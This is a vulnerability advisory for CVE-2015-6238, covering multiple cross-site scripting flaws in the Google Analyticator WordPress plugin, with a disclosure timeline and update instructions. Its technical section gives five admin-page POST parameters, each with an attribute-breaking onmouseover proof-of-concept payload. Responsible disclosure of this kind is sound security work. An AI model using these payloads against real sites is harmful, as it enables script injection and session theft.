Multiple Cross-site Scripting Vulnerabilities Identified in Google Analyticator

Information

Advisory by Netsparker (now Invicti)
Name: Multiple XSS Vulnerabilities in Google Analyticator
Affected Software: Google Analyticator (WordPress Plugin)
Affected Versions: 6.4.9.4 and possibly below
Vendor Homepage: https://wordpress.org/plugins/google-analyticator/ 
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Fixed
CVE-ID: CVE-2015-6238
Invicti Advisory Reference: NS-15-013

Technical Details

Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4:

URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name: ga_adsense
Parameter Type: POST
Attack Pattern: x'" onmouseover=alert(9)

URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name: ga_admin_disable_DimentionIndex
Parameter Type: POST
Attack Pattern: x'" onmouseover=alert(9)

URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name: ga_downloads_prefix
Parameter Type: POST
Attack Pattern: x'" onmouseover=alert(9)

URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name: ga_downloads
Parameter Type: POST
Attack Pattern: x'" onmouseover=alert(9)

URL: http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name: ga_outbound_prefix
Parameter Type: POST
Attack Pattern: x'" onmouseover=alert(9)

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

14/08/2015 – First Contact
24/08/2015 – Vendor Fixed
24/08/2015 – Advisory Released

Solution

Update the plugin to the latest version (6.4.9.6). Download the latest version of the plugin from the following URL: https://downloads.wordpress.org/plugin/google-analyticator.6.4.9.6.zip 

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.